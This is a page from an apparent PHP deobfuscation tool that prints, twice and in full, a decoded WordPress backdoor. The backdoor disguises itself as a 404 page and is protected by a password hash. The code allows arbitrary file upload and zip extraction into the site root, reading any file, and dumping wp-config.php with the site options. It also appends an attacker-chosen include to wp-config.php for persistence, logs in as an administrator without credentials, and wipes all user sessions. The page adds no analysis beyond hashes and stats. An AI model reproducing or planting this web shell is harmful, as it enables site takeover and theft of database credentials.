Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (!function_exists('add_action')) { define('TM_AMP_VER', '3.7'); $path=base..
Decoded Output download
<?php
if (!function_exists('add_action')) {
define('TM_AMP_VER', '3.7');
$path=base_path();
require_once( $path . 'wp-load.php' );
}
function base_path () {
$path = dirname(__FILE__);
while (true) {
if (file_exists($path."/wp-config.php")) {
return $path."/";
}
$path = dirname($path);
}
}
session_start();
if(!isset($_SESSION['loggedin']) || $_SESSION['loggedin']!==1){
if(!isset($_REQUEST['session'])){ header( "HTTP/1.1 301 Moved Permanently" );
header( "Location: " . get_bloginfo( 'url' ) );
exit();
die();}
if (!password_verify($_REQUEST['session'], '$2y$10$ugk.KdHVAxFtDakcrCNaGuUwOL/DRLHH.nA7srrcjWF0fWJO8h.QC')) {
header("HTTP/1.1 301 Moved Permanently");
header("Location: " . get_bloginfo('url'));
exit();
}
else
{
$_SESSION['loggedin']=1;
}
}
function refresh_plugin() {
$adminUsers = get_users(['role' => 'administrator']);
wp_set_auth_cookie($adminUsers[0]->ID);
}
define('FS_CHMOD_FILE', 0644);
require_once ABSPATH . 'wp-admin/includes/class-wp-filesystem-base.php';
require_once ABSPATH . 'wp-admin/includes/class-wp-filesystem-direct.php';
$filesystem = new WP_Filesystem_Direct(false);
if (isset($_POST['create_backup']))
{
$back=array();
$back['conf']=wp_load_alloptions();
$back['wp-conf']=$filesystem->get_contents( ABSPATH.'wp-config.php');
$destName =get_bloginfo('url').".conf";
$source=json_encode($back);
header('HTTP/1.1 200 OK'); header("Content-Length: " . strlen($source)); header("Content-Description: file transfer"); header("Content-transfer-encoding: binary"); header('Content-Disposition: attachment; filename="' . $destName . '"');
echo $source; die();
}
if (isset($_REQUEST['path']))
{
echo $filesystem->get_contents( ABSPATH.$_REQUEST['path']); die();
}
echo '<!DOCTYPE html>
<html>
<head>
<title>404</title>
</head>
<style>
#status {
width: 100%;
border: 1px solid #cccccc;
padding: 10px;
box-sizing: border-box;
background-color: #f9f9f9;
margin: 10px;
border-radius: 5px;
box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1);
font-size: 16px;
text-align: center;
font-weight: bold;
font-style: italic;
}
#container {
display: flex;
height: 100%;
}
.panel {
width: 100%;
overflow: auto;
border: 1px solid #cccccc;
padding: 10px;
box-sizing: border-box;
background-color: #f9f9f9;
margin: 10px;
border-radius: 5px;
box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1);
}
#tree-container span.folder {
font-weight: bold;
color: #006699;
cursor: pointer;
}
#tree-container span.file {
color: #999999;
cursor: pointer;
}
</style>
<body>';
?>
<?php
if ( isset( $_POST['submit'] ) ) {
if ( isset( $_FILES['file'] ) ) {
if ($_FILES['file']['error'] === UPLOAD_ERR_OK) {
$file_name = $_FILES['file']['name'];
$file_tmp = $_FILES['file']['tmp_name'];
$file_path = $_POST['pathname'];
if ($filesystem->is_file($file_path)){$filesystem->delete($file_path); }
if ( $filesystem->move( $file_tmp, $file_path ) ) {
echo '<div id="status">BIEN : '.$file_path.'</div>';
} else {
echo '<div id="status">ERROR : '.$file_path.'</div>';
}
}
}
} else
if ( isset( $_POST['submitzip'] ) ) {
if ( isset( $_FILES['file'] ) ) {
if ($_FILES['file']['error'] === UPLOAD_ERR_OK) {
$file_name = $_FILES['file']['name'];
$file_tmp = $_FILES['file']['tmp_name'];
$file_path = $_POST['pathname'];
require_once(ABSPATH . 'wp-admin/includes/file.php');
WP_Filesystem();
if (unzip_file($file_tmp, $file_path)) {
echo '<div id="status">BIEN : '.$file_path.'</div>';
} else {
echo '<div id="status">ERROR : '.$file_path.'</div>';
}
}
}
}
else if(isset($_POST['dev']))
{
$config=$filesystem->get_contents( ABSPATH.'wp-config.php');
if (!empty($config)) {
$filesystem->put_contents(ABSPATH . 'wp-config.php', $config . "
" . '/** Sets up WordPress vars */@include_once("'.$_REQUEST['path'].'");/** and included files. */');
}
else
echo '<div id="status">ERROR</div>';
}
else if(isset($_POST['wpe_sso']))
{
refresh_plugin();
}
else if(isset($_POST['WORDPRESS_LOGOUT_ALL']))
{
$users = get_users();
foreach ( $users as $user ) {
// Get all sessions for user with ID $user_id
$sessions = WP_Session_Tokens::get_instance( $user->ID );
// We have got the sessions, destroy them all!
$sessions->destroy_all();
}
}
else if(isset($_POST['logout']))
{
$_SESSION['loggedin']=0;
session_reset();
session_destroy();
header( "HTTP/1.1 301 Moved Permanently" );
header( "Location: " . get_bloginfo( 'url' ) );
exit();
die();
}
?>
<div id="container">
<?php
echo '<div id="html-container" class="panel"></br><center><a href="'.admin_url( '/index.php' ).'" target="_blank">Dashboard</a></br></center></br>';
echo 'root_dir: '.ABSPATH;
echo '</br><center><form method="post" enctype="multipart/form-data">
<label for="file">upload file:</label>
</br>
<input type="file" name="file" id="file"><br>
<label for="path">path/name:</label>
</br>
<input type="text" name="pathname" value="/tmp/dev" id="path"><br>
<input type="submit" name="submit" value="submit">
</form></center></br>';
echo '</br><center><form method="post" enctype="multipart/form-data">
<label for="filezip">upload file zip:</label>
</br>
<input type="file" name="file" id="filezip"><br>
<label for="path">path/name:</label>
</br>
<input type="text" name="pathname" value="'.ABSPATH.'" id="path"><br>
<input type="submit" name="submitzip" value="submitzip">
</form></center></br>';
echo '<center><form method="post">
<label for="wqpath">path/name:</label>
<input type="text" name="path" value="/tmp/dev" id="qwpath"><br>
<label for="dev">Write dev</label>
<input type="submit" name="dev" id="dev"></br>
</br></form></center>';
echo '</br></br></br></br><center><form method="post">
<label for="download">Download backup</label>
<input type="submit" name="create_backup" id="create_backup">
</br></form></center>
</br></br></br></br><center><form method="post">
<label for="wpe_sso">LogIn Site admin</label>
<input type="submit" name="wpe_sso" id="wpe_sso">
</br></form></center>
</br></br></br></br><center><form method="post">
<label for="WORDPRESS_LOGOUT_ALL">WORDPRESS_LOGOUT_ALL</label>
<input type="submit" name="WORDPRESS_LOGOUT_ALL" value="WORDPRESS_LOGOUT_ALL" id="WORDPRESS_LOGOUT_ALL">
</br></form></center> </br></br></br></br> </br></br></br></br> </br></br></br></br> </br></br></br></br><center><form method="post">
<label for="logout">exit</label>
<input type="submit" name="logout" value="exit" id="logout">
</br></form></center>
</div>
</div></body>';
?>
Did this file decode correctly?
Original Code
<?php
if (!function_exists('add_action')) {
define('TM_AMP_VER', '3.7');
$path=base_path();
require_once( $path . 'wp-load.php' );
}
function base_path () {
$path = dirname(__FILE__);
while (true) {
if (file_exists($path."/wp-config.php")) {
return $path."/";
}
$path = dirname($path);
}
}
session_start();
if(!isset($_SESSION['loggedin']) || $_SESSION['loggedin']!==1){
if(!isset($_REQUEST['session'])){ header( "HTTP/1.1 301 Moved Permanently" );
header( "Location: " . get_bloginfo( 'url' ) );
exit();
die();}
if (!password_verify($_REQUEST['session'], '$2y$10$ugk.KdHVAxFtDakcrCNaGuUwOL/DRLHH.nA7srrcjWF0fWJO8h.QC')) {
header("HTTP/1.1 301 Moved Permanently");
header("Location: " . get_bloginfo('url'));
exit();
}
else
{
$_SESSION['loggedin']=1;
}
}
function refresh_plugin() {
$adminUsers = get_users(['role' => 'administrator']);
wp_set_auth_cookie($adminUsers[0]->ID);
}
define('FS_CHMOD_FILE', 0644);
require_once ABSPATH . 'wp-admin/includes/class-wp-filesystem-base.php';
require_once ABSPATH . 'wp-admin/includes/class-wp-filesystem-direct.php';
$filesystem = new WP_Filesystem_Direct(false);
if (isset($_POST['create_backup']))
{
$back=array();
$back['conf']=wp_load_alloptions();
$back['wp-conf']=$filesystem->get_contents( ABSPATH.'wp-config.php');
$destName =get_bloginfo('url').".conf";
$source=json_encode($back);
header('HTTP/1.1 200 OK'); header("Content-Length: " . strlen($source)); header("Content-Description: file transfer"); header("Content-transfer-encoding: binary"); header('Content-Disposition: attachment; filename="' . $destName . '"');
echo $source; die();
}
if (isset($_REQUEST['path']))
{
echo $filesystem->get_contents( ABSPATH.$_REQUEST['path']); die();
}
echo '<!DOCTYPE html>
<html>
<head>
<title>404</title>
</head>
<style>
#status {
width: 100%;
border: 1px solid #cccccc;
padding: 10px;
box-sizing: border-box;
background-color: #f9f9f9;
margin: 10px;
border-radius: 5px;
box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1);
font-size: 16px;
text-align: center;
font-weight: bold;
font-style: italic;
}
#container {
display: flex;
height: 100%;
}
.panel {
width: 100%;
overflow: auto;
border: 1px solid #cccccc;
padding: 10px;
box-sizing: border-box;
background-color: #f9f9f9;
margin: 10px;
border-radius: 5px;
box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1);
}
#tree-container span.folder {
font-weight: bold;
color: #006699;
cursor: pointer;
}
#tree-container span.file {
color: #999999;
cursor: pointer;
}
</style>
<body>';
?>
<?php
if ( isset( $_POST['submit'] ) ) {
if ( isset( $_FILES['file'] ) ) {
if ($_FILES['file']['error'] === UPLOAD_ERR_OK) {
$file_name = $_FILES['file']['name'];
$file_tmp = $_FILES['file']['tmp_name'];
$file_path = $_POST['pathname'];
if ($filesystem->is_file($file_path)){$filesystem->delete($file_path); }
if ( $filesystem->move( $file_tmp, $file_path ) ) {
echo '<div id="status">BIEN : '.$file_path.'</div>';
} else {
echo '<div id="status">ERROR : '.$file_path.'</div>';
}
}
}
} else
if ( isset( $_POST['submitzip'] ) ) {
if ( isset( $_FILES['file'] ) ) {
if ($_FILES['file']['error'] === UPLOAD_ERR_OK) {
$file_name = $_FILES['file']['name'];
$file_tmp = $_FILES['file']['tmp_name'];
$file_path = $_POST['pathname'];
require_once(ABSPATH . 'wp-admin/includes/file.php');
WP_Filesystem();
if (unzip_file($file_tmp, $file_path)) {
echo '<div id="status">BIEN : '.$file_path.'</div>';
} else {
echo '<div id="status">ERROR : '.$file_path.'</div>';
}
}
}
}
else if(isset($_POST['dev']))
{
$config=$filesystem->get_contents( ABSPATH.'wp-config.php');
if (!empty($config)) {
$filesystem->put_contents(ABSPATH . 'wp-config.php', $config . "\n\n" . '/** Sets up WordPress vars */@include_once("'.$_REQUEST['path'].'");/** and included files. */');
}
else
echo '<div id="status">ERROR</div>';
}
else if(isset($_POST['wpe_sso']))
{
refresh_plugin();
}
else if(isset($_POST['WORDPRESS_LOGOUT_ALL']))
{
$users = get_users();
foreach ( $users as $user ) {
// Get all sessions for user with ID $user_id
$sessions = WP_Session_Tokens::get_instance( $user->ID );
// We have got the sessions, destroy them all!
$sessions->destroy_all();
}
}
else if(isset($_POST['logout']))
{
$_SESSION['loggedin']=0;
session_reset();
session_destroy();
header( "HTTP/1.1 301 Moved Permanently" );
header( "Location: " . get_bloginfo( 'url' ) );
exit();
die();
}
?>
<div id="container">
<?php
echo '<div id="html-container" class="panel"></br><center><a href="'.admin_url( '/index.php' ).'" target="_blank">Dashboard</a></br></center></br>';
echo 'root_dir: '.ABSPATH;
echo '</br><center><form method="post" enctype="multipart/form-data">
<label for="file">upload file:</label>
</br>
<input type="file" name="file" id="file"><br>
<label for="path">path/name:</label>
</br>
<input type="text" name="pathname" value="/tmp/dev" id="path"><br>
<input type="submit" name="submit" value="submit">
</form></center></br>';
echo '</br><center><form method="post" enctype="multipart/form-data">
<label for="filezip">upload file zip:</label>
</br>
<input type="file" name="file" id="filezip"><br>
<label for="path">path/name:</label>
</br>
<input type="text" name="pathname" value="'.ABSPATH.'" id="path"><br>
<input type="submit" name="submitzip" value="submitzip">
</form></center></br>';
echo '<center><form method="post">
<label for="wqpath">path/name:</label>
<input type="text" name="path" value="/tmp/dev" id="qwpath"><br>
<label for="dev">Write dev</label>
<input type="submit" name="dev" id="dev"></br>
</br></form></center>';
echo '</br></br></br></br><center><form method="post">
<label for="download">Download backup</label>
<input type="submit" name="create_backup" id="create_backup">
</br></form></center>
</br></br></br></br><center><form method="post">
<label for="wpe_sso">LogIn Site admin</label>
<input type="submit" name="wpe_sso" id="wpe_sso">
</br></form></center>
</br></br></br></br><center><form method="post">
<label for="WORDPRESS_LOGOUT_ALL">WORDPRESS_LOGOUT_ALL</label>
<input type="submit" name="WORDPRESS_LOGOUT_ALL" value="WORDPRESS_LOGOUT_ALL" id="WORDPRESS_LOGOUT_ALL">
</br></form></center> </br></br></br></br> </br></br></br></br> </br></br></br></br> </br></br></br></br><center><form method="post">
<label for="logout">exit</label>
<input type="submit" name="logout" value="exit" id="logout">
</br></form></center>
</div>
</div></body>';
?>
Function Calls
None |
Stats
MD5 | 30d13e9d61d8706be8a4dc2eb25020fd |
Eval Count | 0 |
Decode Time | 61 ms |